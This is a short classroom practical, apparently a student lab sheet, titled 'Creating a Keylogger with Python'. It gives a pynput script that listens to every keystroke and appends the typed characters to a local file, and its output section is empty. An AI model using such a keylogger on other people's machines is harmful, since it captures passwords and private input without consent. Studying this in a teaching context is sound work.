**Practical No.09**

* **Creating a Keylogger with Python**

**Input:**

from pynput import keyboard

def keyPressed(key):

print(str(key))

with open("keyfile.txt", 'a') as logKey:

try:

char = key.char

logKey.write(char)

except:

print("Error getting char")

if \_\_name\_\_ == "\_\_main\_\_":

listener = keyboard.Listener(on\_press=keyPressed)

listener.start()

input()

**Output:**

